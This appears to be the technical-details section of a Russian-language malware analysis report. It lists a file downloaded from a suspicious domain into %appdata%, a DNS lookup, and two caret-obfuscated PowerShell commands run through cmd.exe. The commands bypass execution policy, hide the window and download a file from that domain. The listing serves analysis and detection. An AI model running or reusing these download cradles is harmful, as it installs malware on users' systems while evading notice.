Техническая информация
- http://cometogod.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^owe^RsH^E^lL.exe ^-eXec^ut^ionpo^Li^cy^ ^B^y^pa^ss -^NoPr^O^FilE -wINd^ow^St^y^l^e hIDden ^(N^ew-oBJ^E^c^T ^syStem.^N^E^T.WEBCLIE^NT).DoW^NL^oAdFi^l^e^('http://cometogod.t...
- DNS ASK co###ogod.top
- '<SYSTEM32>\cmd.exe' /C "P^owe^RsH^E^lL.exe ^-eXec^ut^ionpo^Li^cy^ ^B^y^pa^ss -^NoPr^O^FilE -wINd^ow^St^y^l^e hIDden ^(N^ew-oBJ^E^c^T ^syStem.^N^E^T.WEBCLIE^NT).DoW^NL^oAdFi^l^e^('http://cometogod.t...' (со скрытым окном)